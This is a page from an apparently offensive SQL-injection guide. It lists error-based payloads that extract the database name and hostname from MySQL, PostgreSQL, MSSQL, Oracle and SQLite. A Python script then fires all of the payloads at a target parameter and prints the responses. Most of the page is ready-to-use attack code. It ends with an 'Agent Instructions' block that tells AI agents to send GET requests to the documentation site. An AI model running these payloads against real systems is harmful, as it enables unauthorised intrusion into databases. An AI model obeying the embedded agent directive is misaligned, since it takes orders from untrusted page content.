# Extracting Database Name and Hostname Using Forced Errors
### MySQL
**Extracting Database Name**
* Use error-based injection to extract the database name.
```sql
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) --
```
**Extracting Hostname**
* Use error-based injection to extract the hostname.
' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT @@hostname), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) --
### PostgreSQL
**Extracting Database Name**
* Use error-based injection to extract the current database name.
```sql
' AND 1=CAST((SELECT current_database()) AS INT) --
```
**Extracting Hostname**
* PostgreSQL does not directly provide a function for hostname, but you can use other metadata queries or built-in extensions like `inet_server_addr`.
```sql
' AND 1=CAST((SELECT inet_server_addr()) AS INT) --
```
### MSSQL
**Extracting Database Name**
* Use error-based injection to extract the current database name.
```sql
'; SELECT 1 WHERE 1=CAST(DB_NAME() AS INT) --
```
**Extracting Hostname**
* Use error-based injection to extract the server hostname.
```sql
'; SELECT 1 WHERE 1=CAST(@@servername AS INT) --
```
### Oracle
**Extracting Database Name**
* Use error-based injection to extract the current database name.
```sql
' UNION SELECT NULL FROM dual WHERE 1=CAST((SELECT ora_database_name FROM dual) AS INT) --
```
**Extracting Hostname**
* Use error-based injection to extract the hostname.
' UNION SELECT NULL FROM dual WHERE 1=CAST((SELECT SYS_CONTEXT('USERENV', 'HOST') FROM dual) AS INT) --
### SQLite
**Extracting Database Name**
* SQLite uses a single database per file, but you can force errors to reveal database-related information.
```sql
' AND 1=CAST((SELECT name FROM sqlite_master WHERE type='table' LIMIT 1) AS INT) --
```
**Extracting Hostname**
* SQLite does not inherently have a hostname since it’s a file-based database. However, you can infer file paths which might give clues.
' AND 1=CAST((SELECT file FROM pragma_database_list LIMIT 1) AS INT) --
### Python Script to Automate the Process
```python
import requests
url = "http://example.com/vulnerable.php"
payloads = [
# MySQL
"' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) -- ",
"' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT @@hostname), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) -- ",
# PostgreSQL
"' AND 1=CAST((SELECT current_database()) AS INT) -- ",
"' AND 1=CAST((SELECT inet_server_addr()) AS INT) -- ",
# MSSQL
"; SELECT 1 WHERE 1=CAST(DB_NAME() AS INT) -- ",
"; SELECT 1 WHERE 1=CAST(@@servername AS INT) -- ",
# Oracle
"' UNION SELECT NULL FROM dual WHERE 1=CAST((SELECT ora_database_name FROM dual) AS INT) -- ",
"' UNION SELECT NULL FROM dual WHERE 1=CAST((SELECT SYS_CONTEXT('USERENV', 'HOST') FROM dual) AS INT) -- ",
# SQLite
"' AND 1=CAST((SELECT name FROM sqlite_master WHERE type='table' LIMIT 1) AS INT) -- ",
"' AND 1=CAST((SELECT file FROM pragma_database_list LIMIT 1) AS INT) -- ",
]
for payload in payloads:
response = requests.get(url, params={"id": payload})
print(f"Payload: {payload}")
print(f"Response: {response.text}\n")
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://nav1n0x.gitbook.io/advanced-sql-injection-techniques/extracting-database-name-and-hostname-using-forced-errors.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.